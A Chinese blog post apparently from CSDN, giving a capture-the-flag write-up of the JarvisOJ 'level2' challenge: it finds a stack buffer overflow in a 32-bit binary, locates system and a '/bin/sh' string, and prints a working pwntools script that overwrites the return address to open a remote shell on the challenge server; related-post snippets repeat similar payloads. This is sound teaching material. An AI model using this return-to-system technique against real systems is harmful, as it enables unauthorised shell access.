jarvisoj-level2

最新推荐文章于 2024-02-04 15:12:47 发布
最新推荐文章于 2024-02-04 15:12:47 发布
阅读量1.3k 收藏 1
点赞数 2
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_35661990/article/details/83902369
版权

只开了NX,栈上不可执行

main函数

  vulnerable_function();
  system("echo 'Hello World!'");
  return 0;

function函数

  char buf; // [esp+0h] [ebp-88h]

  system("echo Input:");
  return read(0, &buf, 0x100u);

这次没有像level1一样直接泄露buf地址了,而且开了NX就不能用shellcode了,另外程序没有开canary(栈溢出检测)所以用基本的ROP

因为程序没有开内存地址随机化(PIE),直接用IDA里上方菜单栏内的serch for text查一下system和\bin\sh的地址

.data:0804A024                 public hint
.data:0804A024 hint            db '/bin/sh',0
.data:0804A024 _data           ends

.plt:08048320                 jmp     ds:off_804A010
.plt:08048320 _system         endp

这里有个困惑是IDA里左边列表的_system和system有什么差别呢?system在IDA里是粉色框,是因为main函数没有调用到它吗?之后阅读IDA权威指南的时候希望能找到原因。

有了system和\bin\sh的地址后,就能构造payload了

from pwn import *
context(log_level = 'debug', arch = 'i386', os = 'linux')

s=remote("pwn2.jarvisoj.com",9878)
payload='a'*0x88+'a'*4+p32(0x08048320)+p32(0x08048320)+p32(0x0804a024)
#这里是0x88+4个'a'把栈和ebp填满,之后用system的地址覆盖返回地址,之后跟着随便一个地址,是system函数执行的地址,这里我直接用system原有的地址(任意地址都可以),最后跟着/bin/sh字符串存放的地址,作为system函数的参数
text=s.recvline()
print text
s.send(payload)
s.interactive()

不过像https://www.cnblogs.com/WangAoBo/p/7622091.html里用ELF读取本地level2文件,再用symbols[‘system’]获取system函数地址,以及用search("/bin/sh").next()得到字符串地址的方式更具有通用性。

吾梦不尽
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
xenonstack-module-level2
03-25
xenonstack-module-level2
Sedona-level2
03-16
Sedona-level2
jarvisoj_level2解题
suyuany的博客
02-04 291
payload=b'a'*(0x88+0x4)+p32(sys_addr)+p32(可为任意数值)+p32(binsh)双击点开vulnerable_function()
jarvisoj的pwn中level系列wp
Huiuyao的博客
12-09 2776
由于最近攻防世界的动态环境又崩了,因此找到了jarvisoj这么个oj,网站地址如下 [jarvisoj](https://www.jarvisoj.com/) 其中会有rank与题目数,其中的pwn有个level系列网上还挺火的,因此就顺便做了一下,主要是解决一些可能新手不理解的部分。 ## level1 ...
[BUUCTF-pwn]——jarvisoj_level302-21
Y_peak的博客
02-21 169
[BUUCTF-pwn]——jarvisoj_level3 题目地址: https://buuoj.cn/challenges#jarvisoj_level3 以前好像写过这个题, 就不详细写了。有兴趣的可以去之前的博客翻一下, 就在BUU和OJ 里面 大致思路, 泄露出一个地址, 找到对应的libc版本。计算偏移找到system和’/bin/sh’ exploit from pwn import * from LibcSearcher import * p = remote("node3.buuoj
jarvisoj_level2【BUUCTF】
qq_41696518的博客
08-26 592
jarvisoj_level2【BUUCTF】
jarvisoj level1-2
sun的博客
10-03 614
level1 先使用checksec查询一下这个保护机制没有开启任何保护 [*] '/home/sun/Desktop/1' Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX disabled PIE: No PIE (0x...
BUUCTF jarvisoj_level2 题解
qq_51802916的博客
08-20 249
可以看到程序中已经有了shell的字符串,由于是32位程序,函数的参数通过压栈传递,因此我们可以直接将其地址放在system之后就能够完成参数的传递。而不是使用call指令,因此计算机会将调用函数前栈顶指针指向的地址视为函数的返回地址,因此我们需要在这个地方随便填入一些值,然后在后面填入函数的第一个参数。,因此我们需要填充0x88个字符就能到达ebp的位置,然后再填充4个字符就能到达eip的位置,并且。可以看到是32位程序,栈上开启了不可执行保护,但是没有栈检测标志,推测需要进行缓冲区溢出。
jarvis oj level2–两种方式构造函数栈
超人学飞的日子
04-07 579
关于这个level2,在网上找到了两种解法,放在一起分析了一下。 首先查看题目基本信息: 程序开启了栈不可执行保护。 IDA查看反汇编代码: 可以看到存在栈溢出,并且程序调用了system函数。 所以我们的思路就是构造vulnerable_function()的buf变量,使得:返回地址被覆盖为system函数的地址,构造system函数的栈帧,并为system传递参数’/b...
[CTF]jarvisoj_level2
凉水的博客
01-12 479
解题思路 反编译后的源码: undefined4 main(void) { vulnerable_function(); system("echo \'Hello World!\'"); return 0; } void vulnerable_function(void) { undefined local_8c [136]; system("echo Input:"); read(0,local_8c,0x100); return; } 看完上面的反编译,直觉system函数
jarvisoj_level2题解
OrientalGlass的博客
01-08 191
这题没有现成的system("/bin/sh")可以调用,但是有system函数和/bin/sh字符串。所以可以通过溢出修改返回函数为call system位置,并且将栈顶元素修改为/bin/sh所在地址。这样就可以成功执行system("/bin/sh")2.ida查看,很显然这里有栈溢出。4.寻找system和bin/sh。1.checksec查看。
elasticsearch-rest-high-level-client-6.8.3-API文档-中英对照版.zip
07-13
赠送jar包:elasticsearch-rest-high-level-client-6.8.3.jar; 赠送原API文档:elasticsearch-rest-high-level-client-6.8.3-javadoc.jar; 赠送源代码:elasticsearch-rest-high-level-client-6.8.3-sources.jar;...
elasticsearch-rest-high-level-client-6.8.3-API文档-中文版.zip
07-13
赠送jar包:elasticsearch-rest-high-level-client-6.8.3.jar; 赠送原API文档:elasticsearch-rest-high-level-client-6.8.3-javadoc.jar; 赠送源代码:elasticsearch-rest-high-level-client-6.8.3-sources.jar;...
Level-2核心内参
01-26
Level-2核心内参,每天收盘后的信息汇总
infrared-remote-candroid studiodemo
05-05
android studio下载
【新质生产力】新质生产力赋能智能制造数字化解决方案.pptx
05-05
【新质生产力】新质生产力赋能智能制造数字化解决方案.pptx
基于matlab实现的用于应用布格重力异常数据反演地下异常密度体.rar
05-05
基于matlab实现的用于应用布格重力异常数据反演地下异常密度体.rar
node-v8.10.0-linux-x64.tar.xz
最新发布
05-05
Node.js,简称Node,是一个开源且跨平台的JavaScript运行时环境,它允许在浏览器外运行JavaScript代码。Node.js于2009年由Ryan Dahl创立,旨在创建高性能的Web服务器和网络应用程序。它基于Google Chrome的V8 JavaScript引擎,可以在Windows、Linux、Unix、Mac OS X等操作系统上运行。 Node.js的特点之一是事件驱动和非阻塞I/O模型,这使得它非常适合处理大量并发连接,从而在构建实时应用程序如在线游戏、聊天应用以及实时通讯服务时表现卓越。此外,Node.js使用了模块化的架构,通过npm(Node package manager,Node包管理器),社区成员可以共享和复用代码,极大地促进了Node.js生态系统的发展和扩张。 Node.js不仅用于服务器端开发。随着技术的发展,它也被用于构建工具链、开发桌面应用程序、物联网设备等。Node.js能够处理文件系统、操作数据库、处理网络请求等,因此,开发者可以用JavaScript编写全栈应用程序,这一点大大提高了开发效率和便捷性。 在实践中,许多大型企业和组织已经采用Node.js作为其Web应用程序的开发平台,如Netflix、PayPal和Walmart等。它们利用Node.js提高了应用性能,简化了开发流程,并且能更快地响应市场需求。
jarvisoj_level2
08-13
JarvisOJLevel2题目中,给出了三个关于解题的代码片段的引用。引用和都是给出了关于解题的代码,其中引用是关于x64架构的代码,引用是关于i386架构的代码。这些代码都是用于获取Shell的payload。而引用则是对这...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值